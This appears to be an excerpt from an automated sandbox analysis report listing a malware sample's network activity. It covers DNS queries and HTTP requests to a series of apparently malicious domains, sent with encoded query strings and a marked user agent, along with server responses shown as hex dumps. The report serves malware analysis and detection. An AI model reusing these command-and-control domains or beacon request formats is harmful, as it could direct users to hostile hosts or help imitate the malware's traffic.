                Source: Joe Sandbox ViewIP Address: 85.159.66.93 85.159.66.93
                Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
                Source: Joe Sandbox ViewASN Name: CHARTER-20115US CHARTER-20115US
                Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.3.min.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: code.jquery.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /b?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /b2?rn=1733906389191&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-AliveCookie: UID=10451f5f0fc3adf6ec43d6f1733906392
                Source: global trafficHTTP traffic detected: GET /b?rn=1733906391803&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0AAC219A23FF65473A3534C82257645E&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: sb.scorecardresearch.comConnection: Keep-AliveCookie: UID=10451f5f0fc3adf6ec43d6f1733906392
                Source: global trafficHTTP traffic detected: GET /ast/ast.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://www.msn.com/?ocid=iehpAccept-Language: en-CHUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: acdn.adnxs.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /enzp/?rJl09=1ZZ8JloHsT&x6lPJLCP=cVkvAZaY29GpnsZyqIF2yuifFE7HKV6pnqAC3WUldb4fq/7Oh6qhLNzjv12xoDmrSb6mv5wmBpstJhqJzvfwj9LP9u3P+B96vBaOMx3H/c3knsZvSPscaH9VeTyek1Wueg== HTTP/1.1Host: www.sidqwdf.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /08fk/?x6lPJLCP=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a2c74LOyggA49CLKBjXnF5RURV/WQoh8PUXC31RcEPJm/FQ==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.swenansiansie.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /v70f/?x6lPJLCP=BBAjdqWYBB/MRyq00dIcezl7OvIx5dSebduL9p4zICzjFNfvyshgEJ0+kFvLW81K0aQqDuxS3lz73s8YF+5iQllq44F7p5XcgmXLNN6nBjN0OyNZNCI3LIrenW8X1LlSCw==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.spectre.centerAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /6sgf/?rJl09=1ZZ8JloHsT&x6lPJLCP=6iGJK9crk1nRcZ4JnjW5XFV8mHNB14071bVcqkX9tU6kQKoAsGb7iBX66eKgx6XFHSItuyLYYeRhUgDlnjjXc53AprHIV9+v08MymvOxMZcaRpk3N2TApqLdZWOdbNTanQ== HTTP/1.1Host: www.synd.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /ohf8/?x6lPJLCP=ll5dDbshsmxjCV2KoC1RTtNOe9IddMOnmIejqeX5AC+cgPBA3oVXvxxUo0hOqHqzs3EuIGVBpbOb4OwgMNYqPbYAwUAuWDp6UnVXFlAI3b5100n+OibKRbWUxoSKuxi8jQ==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.jagdud.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /gofy/?rJl09=1ZZ8JloHsT&x6lPJLCP=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iYwq1hqOz1ZLmRiq4yHoZPRguvsYQiOAaJNLLKitFG0GncQ== HTTP/1.1Host: www.wiretap.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /5l50/?x6lPJLCP=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBnieG4J/eeLMerUPxhx3GPRLnwREz1wysoKm2qVDM0wOtjw3A==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.it2sp8.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /cvmn/?rJl09=1ZZ8JloHsT&x6lPJLCP=kT2PVcuYPhCIcYe2L3yhSZm/01N2YaEp7Mi6RbxY9XuRZq3jntXnn9h0Tz9dUD6RU59Ud1zluKO0dVzp+S+rlqihV/9WGn7dFY/VPBSofhkjf/J1JjJf3ZvirEaB7f293g== HTTP/1.1Host: www.cbprecise.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /tjfd/?x6lPJLCP=hU18Z//aae7PuBg9apJb96loanMP5/1Vub46+YuE1RepJ+epEltxKOfVY+omXPiOW2IODI1uSb7TTTd0R0t6pBQ2oDkul8elmVnFCv+DogCI8xDe2U6+F55NhYNnYDS/oA==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.yun08ps.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /mbcs/?x6lPJLCP=E8uKnHhByG2Tv3dXt0hUXbTg8EJLb11h3Xjfw3eru7l4vir7amLvL6eqi8CHILvLkZwm8qiwgwp5C/0JAU8dkG6IkADn3bpuAlwPLI3cNsyNCOAib3p0DeKOekQmhkdC2g==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.rtpsilva4d.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: global trafficHTTP traffic detected: GET /jm9b/?x6lPJLCP=XoRMlRQavUBSvHE6AV2eFSHD1vC94NgmQfaFO5StTzEKBs4nBsZa6I2TGaV3pACayJ+XHXZH2+vi6MzB3UVztjakyssOm3dqQA7FXQmUsXh8tqb4LmqnuepmKmLDXrWJpg==&rJl09=1ZZ8JloHsT HTTP/1.1Host: www.restobarbebek.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                Source: 000003.log4.19.dr, uu_host_config.19.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log4.19.dr, uu_host_config.19.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log4.19.dr, uu_host_config.19.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: msapplication.xml1.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x40e72453,0x01db4ba8</date><accdate>0x40e72453,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
                Source: msapplication.xml6.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x40eff9ba,0x01db4ba8</date><accdate>0x40eff9ba,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
                Source: msapplication.xml8.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x40f266f1,0x01db4ba8</date><accdate>0x40f4d257,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: www.sidqwdf.fun
                Source: global trafficDNS traffic detected: DNS query: www.msn.com
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: global trafficDNS traffic detected: DNS query: c.msn.com
                Source: global trafficDNS traffic detected: DNS query: code.jquery.com
                Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.com
                Source: global trafficDNS traffic detected: DNS query: acdn.adnxs.com
                Source: global trafficDNS traffic detected: DNS query: www.swenansiansie.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mp3cevir.xyz
                Source: global trafficDNS traffic detected: DNS query: www.spectre.center
                Source: global trafficDNS traffic detected: DNS query: www.synd.fun
                Source: global trafficDNS traffic detected: DNS query: www.jagdud.store
                Source: global trafficDNS traffic detected: DNS query: www.wiretap.digital
                Source: global trafficDNS traffic detected: DNS query: www.it2sp8.vip
                Source: global trafficDNS traffic detected: DNS query: www.cbprecise.online
                Source: global trafficDNS traffic detected: DNS query: www.yun08ps.top
                Source: global trafficDNS traffic detected: DNS query: www.rtpsilva4d.click
                Source: global trafficDNS traffic detected: DNS query: www.restobarbebek.xyz
                Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 11 Dec 2024 08:40:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 11 Dec 2024 08:40:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 11 Dec 2024 08:40:37 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 08:40:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 08:40:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 08:40:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 08:40:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:41:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:41:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:41:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:41:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
